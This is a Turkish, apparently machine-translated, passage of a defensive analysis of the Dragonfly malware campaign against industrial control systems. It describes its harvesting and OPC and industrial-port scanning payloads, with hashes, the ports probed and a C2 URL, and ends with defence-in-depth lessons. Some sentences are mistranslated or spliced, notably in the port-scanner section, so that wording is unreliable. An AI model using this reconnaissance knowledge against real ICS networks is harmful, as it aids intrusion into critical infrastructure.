Dosya adlandırma rastgele görünmez,daha ziyade onaltılık sıralama düzeni kullanılmıştır. Analiz edilen durumların çoğunda, Eğer malware yönetimsel ayrıcalıklara sahip olarak çalıştırılmış ise, numaralandırma 6 ve 9 arasında başlardı. Kısıtlı kullanıcı hesapları kullanılırken numaralar “4A” da başladı .
Aşama 1 – Outlook Kişileri Tutucu Yükü
Aşağıdaki başarılı bir C2 bağlantısı indirilen ilk modül yerel ana bilgisayardaki iletişim bilgileri ifşa için tasarlanmıştı. Bu, otomatik tamamlama özellikleri için Microsoft Office tarafından kullanılan outlook. nk2 dosyasının içerdiği bilgileri kopyalayarak başarılmıştı.Bilgi daha sonra yukarıda açıklandığı gibi %TEMP%\[seq_no].yls dosyasına yerleştirilmiş ve C2 sunucusuna transfer edilmiştir. Bu yük ayrıntıları Tablo 6’da verilmiştir.
Aşama 2 – Sistem Bilgileri Tutucu Yükü
İndirilen diğer modül mevcut sistem ve onun konfigürasyonları hakkındaki temel bilgileri toplamak için tasarlanmıştır. Bu geniş kapsamlı özet Şekil 5’te özetlenmiştir. Kullanıcı adı, yerel sürücüler, varsayılan tarayıcı, çalışan süreçler gibi bilgiler, ve Masaüstü, Belgelerim, Program dosyaları ve kök dizinlerinin dosyalarının bir listesi ele geçirilir.
Symantec raporu tarafından sağlanan bilgiler saldırının bu aşamasının da “ICS-ile ilgili konfigürasyon dosyaları” ve “VPN konfigürasyon dosyalarının” toplandığını belirtiyor. Bu bilgiler , VPN yapılandırma bilgilerinin eWON eCatcher uygulamasından alındığını ima etmek için tahmin edilebilir.
eWON olay danışma incelemesi ve eCatcher uygulaması için değişiklik günlüğü “Şifreli kullanıcı şifresi artık bilgisayarda depolanmadığı” uygulamanın güncellenmiş revizyonu 4.1.0 da bildirilen benzer bilgiler içerir. EGrabit revizyonu 3.1 için kullanılan benzer bilgiler tüm şiferelerin şifresiz metinde depolandığı eWON yazılımının hedef alınan 3.0 sürümünde ima edilen “Şifrelerin artık konfigürasyon sayfası içinde gizli/saklı olduğu” 85 durum oluşturur.
Bu yük ile ilgili ayrıntılar aşağıda sunulmuştur:
| Dosya adı: | %TEMP%\[seq_no].tmp.dll |
| Dosya boyutu: | 400896 |
| MD5: | 840417d79736471c2f331550be993d79 |
| SHA-1: | 7e9e78bb65957b756e4b9b5226747437e50c176c |
| SHA-256: | f4bfca326d32ce9be509325947c7eaa4fb90a5f81b5abd7c1c76aabb1b48be22 |
Aşama 3 – OPC Tarayıcı Yükü
VirusTotal tarafından sağlanan örnekler ile gözlemlenen son veri yükü yerel alan ağındaki tüm Windows ana bilgisayarları listelemek ve sonra çalışabilecek olan her bir OPC ile ilgili hizmetleri sorgulamak için kullanıldı.Bu veri yükünün listeleri en son kullanılan (MRU) Windowsun gözden geçirilmesinin yanı sıra, canlı ağ taramalarının kombinasyonu kullandığı görünmektedir. MRUların kullanımı, modül daha önce ağda bulunan fakat fiili tarama yapıldığında bulunmayan düğümleri listelerken keşfedildi. Modül ağdaki Windows olmayan cihazları tanımlayamadı. Aynı zamanda sadece varsayılan ağ geçidi üzerinden erişilebilir ağlarda varolan aygıtları belirleyemedi(yani, katman 3 yönlendirmesi ile)
Kaspersky‘e göre , tüm OPC tarayıcı modülleri Nisan ve Mayıs 2014 arasında derlenmiştir . Bu OPC komponentinin Mesa Imaging ve eWONun önceki ICS ile ilgili uzlaşmalarında olmadığını ve MB Connect Line çözümlerinin bu kullanıcılarının hedef alındığını gösteriyor.
Kötü amaçlı yazılımın yönetimsel ayrıcalıklara sahip bir hesabı kullanarak yüklendiği bazı sistemlerde, yerel kötü amaçlı yazılım C2 sunucularıyla haberleşmeye devam edecektir. Sunucular için yeni hiçbir bilgi bulunmamasına rağmen, kötü amaçlı yazılım durmadan OPC tarayıcı modülü oluşturacaktır.
Bu dakikada birkaç kez oldu ve Windows Gezgini süreci de dahil olmak üzere, hedef bilgisayarlarda çeşitli işlemlerin arızalanmasına neden oldu. Bu davranış kısıtlı kullanıcı hesapları (örneğin, sadece sigara-yönetici ayrıcalıklarına sahip hesaplar) üzerinden malware ile virüs bulaşmış bilgisayarlar üzerinde gözlenmedi.OPC modülünün diğer ilginç özelliği ilk OPC tarama çıktısına dayalı hedeflerin belirgin olmadığı ana bilgisayarlarda OPC hizmetlerini nasıl keşfedebildiğiydi.
Şekil 6 OPC tarayıcı modülünün çalıştığı her bir zamanda oluşan çıktıları gösteriyor. Bu örneklemede, ağda tanımlanan üç ana bilgisayar vardır, bunlardan ikisi çoklu OPC sunucu oluşumları içerir. Ağa bağlı hiçbir PLC “LAN ana bilgisayarları” olarak tanımlanmadı. Toplanan PCAP dosyalarını kullanarak virüs bulaşmış ana bilgisayardan kaynaklı ağ trafiğini değerlendirirken, tarayıcının yukarıda gösterilen ENGTOOLS ana bilgisayarda yüklü OPC hizmetlerini bulduğu keşfedildi.
Bu komponentler belge olarak doğrulandı ve PLC’nin mühendislik araç setini içeren tanılama alıcı araçları olarak yüklendi.
Şekil 7 virüs bulaşmış ana bilgisayarın nasıl defalarca potensiyel hedef (ref paket 754809) üzerinde DCE Bind talebi başlattığını ve sonra RemoteCreateInstance talebi ile yeni bir OPC örneği oluşturmak için nasıl girişimde bulunduğunu gösteriyor.Her defasında ana bilgisayar “erişim engellendi” cevabı (ref paket 754828) aldı , ancak, bu süreç düzenli aralıklarla süresiz olarak tekrarlar.
OPC yükü için dosya ayrıntıları aşağıda verilmiştir:
| Dosya adı: | %TEMP%\[seq_no].tmp.dll |
| Dosya boyutu : | 251392 |
| MD5: | ba8da708b8784afd36c44bb5f1f436bc |
| SHA-1: | 1c90ecf995a70af8f1d15e9c355b075b4800b4de |
| SHA-256: | 7933809aecb1a9d2110a6fd8a18009f2d9c58b3c7dbda770251096d4fcc18849 |
Aşama 4 – Endüstriyel Protokol Tarayıcı Yükü
Kaspersky genel olarak endüstriyel protokoller ile alakalı TCP hizmet portlarındaki haberleşme için dinlenen ana bilgisayarları arayan bir ağı taramak için tasarlanmış ilave veri yükünü tespit etti. Kaspersky7e göre , bu modül diğer modüller gibi indirildi ve çalıştırıldı.
Uygulamada, modülün kaynak bölümünü içinde barından bir ikili kod deşifre edildi ve %TEMP%\[random]. exe dosyası olarak kaydedildi. Sonra çalıştırılabilir dosya %TEMP%\~tracedscn.yls. dosyasına bir Lan tarama sonuçları günlüğü oluşturdu. Modülünün ekstre bağlantı noktaları şunları içerir:
- 102
- 502
- 11234
- 12401
- 44818
Cihazlardan ziyade SCADA uygulamaları son iki portu kullanır. Onların ScadaPro Sunucusundaki Measuresoft daha önce 11234/udp kullandı. 2011 yılı Eylül ayında bu portta hizmetlerin istismar edildiği bazı güvenlik açıkları ifşa edildi. (referans ICS-CERT ICSA-11-263-01). Measuresoft sürüm 4.0.1. de bu hizmeti devre dışı bıraktı ve bedelsiz olarak tüm müşterilerine bu güncellemeyi sundu.
7-Technologies’in (suan Schneider Electric’in bir parçası) Interactive Graphical SCADA Sistemi (IGSS) , HMIler gibi diğer SCADA alıcıları tarafından kullanılan veri toplama hizmetleri için 12401/tcp kullanır. Measuresoft ile aşağı yukarı aynı zamanda , IGSS SCADA sunusucu için de bazı güvenlik açıkları ortaya çıktı (bir kısmı bu yazar tarafından ifşa edildi).
Bu güvenlik açıklarından her ikisi de Metasploit sisteminde ve diğer açık kaynak çıkışları sayesinde hazır bulunan istismar koduna sahiptirler. Bu porta sadece test amaçlı modül eklendiği üzerinde düşünülebilir. Ancak , hem Measuresoft hem de 7-Technologies sektörde Daragonfly kampanyasından etkilenmiş müşterilere sahip.Bu yüzden, bunun Bileşenlerinin bu detaylı analizi sanayi siber güvenliğinden sorumluolanlar için önemli olan taktik, teknik ve Dragonfly kampanyaprosedürleri ile ilgili anlayışlar bir dizi yol açar. istismar edilebilir güvenlik açıklılarına sahip sistemler için kasti bir arama olması mümkündür.
Kalan üç endüstriyel bağlantı noktası (102, 502, 44818) Siemens S7-Comms, Modbus / TCP ve EtherNet / IP gibi çok yaygın ICS protokolleri tarafından kullanılmaktadır. En önde gelen PLC üreticileri bu protokollerin en az birini destekler. Bu modülün ayrıntıları aşağıda verilmiştir:
| Dosya boyutu: | 223232 |
| Derlenen: | Ekim 29, 2013 – 06:09:14 UTC |
| SHA-256: | 2120c3a30870921ab5e03146a1a1a865dd24a2b5e6f0138bf9f2ebf02d490850 |
Sonuç – Bölüm B
Komponentlerin bu detaylı analizi endüstriyel siber güvenlikten sorumlu olanlar için önemli olan Dragonfly kampanyasının taktik, teknik ve prosedürleri ile ilgili bir dizi görüşe öncülük etmektedir.
- Derinliğine Hücum Dragonfly kapmanyası için önemli bir stratejiydi. Tedarik zinciri satıcılarının yanı sıra , organizasyonun çoklu katmanları hedef alındı. İlaveten, C2 altyapısı saldırının ömrü süresince veri yüklerini geliştirmek ve genişletmek için faillere imkan verdi. Etkili koruma Derinliğine Savunmaya karşılık gelen bir yaklaşım gerektirirdi.
- Enerji dışında sanayi sektörleri artık gelişmiş, kalıcı tehditler konusudur. Bölüm A da tartışıldığı gibi, İlaç endüstrisi Dragonfly kampanyasının hedefi oldu.
- Dragonfly kampanyası kötü amaçlı yazılım yüklerini ICS ekipmanı gibi ulaşılması zor olan uç noktalara direkt olarak teslim etmek için güvenli tedarik zinciri satıcılarının nasıl kullanılabileceğini gösterdi.Bu ,risk değerlendirmelerinin artık potansiyel bir tehdit kaynağı olarak ağlarını kontrol etmek için tedarik zinciri giriş noktalarını göz önünde bulundurduğu anlamına geliyor.
- Amaçlanan hedefler Windows XP çalıştıran ICS bilgisayarlarıydı. Diğer işletim sistemleri için yazılım olsa da, Dragonfly sadece Windows 32-bit eski sürümlerine virüs bulaştırma girişiminde bulundu.
- Yönetimle ilgili olmayan hesaplar bu gibi hesaplarla Dragonfly başarısının gösterdiği gibi endüstriyel ağa bir yol olabilir. Bu yüzden, Güvenli yerel politikalara “sertleştirilmiş” olan bilgisayarlar bile virüs bulaşmış taşıyıcılar olabilirler.
- Güvenli ve izole ICS ağlardan daha az güvenli ofis ağlarına taşınan Laptoplar veya diğer mobil cihazlar Dragonfly’ın mühendislik laptoplarında kalıcı kurulum elde etme yeteneğinin gösterdiği gibi malware için bir giriş noktası da olabilir.
- ICS ağından meydana gelen yetkisiz HTTP trafiğini izleme Derinliğine savunmanın bir parçası olabilir. O bu kötü amaçlı yazılıma karşı etkili bir savunma olacaktır.
Belden’nin Siber Güvenlik Uzmanı, Eric Byres
Bir Belden markası olan Tofino Security’nin teknolojiden sorumlu başkanı (CTO) ve endüstriyel siber güvenlikte dünya otoritesi olan Eric Byres şu açıklamaları yaptı:
“Dragonfly’ın ‘ Derinliğine Hücum ‘ stratejisi ve geleneksel masaüstü güvenlik kontrollerini altettiği gerçeğinin kombinasyonu, santral katında Derinliğine savunma güvenliğini eşleştirmeye acil ihtiyaç olduğunu vurgulamaktadır. Bizim sadece ICS cihazlarını savunmamız gerekmiyor, ama aynı zamanda sanayinin ICS ağı için daha iyi savunmayı dikkate alması gerekiyor.
Örneğin, ICS sisteminden gelen yetkisiz HTTP trafiğini izlemek bu kötü amaçlı yazılıma karşı çok etkili bir savunma olacaktır. Çoğu ICS sistemi Internette web sunucuları ile haberleşmemeli, özellikle de ‘sinfulcelebs. freesexycomics.com.’ şeklindeki URLleri olanlar ile.
Dragonfly kampanyasının ICS trafiğini izlemeyi ve kontrol etmeyi (özellikle giden trafik) gösteren bir algılama olmaksızın neredeyse bir yıl boyunca çalıştığı gerçeği hala bir çok endüstride kabul edilemez biçimde zayıftır.”
0 Comments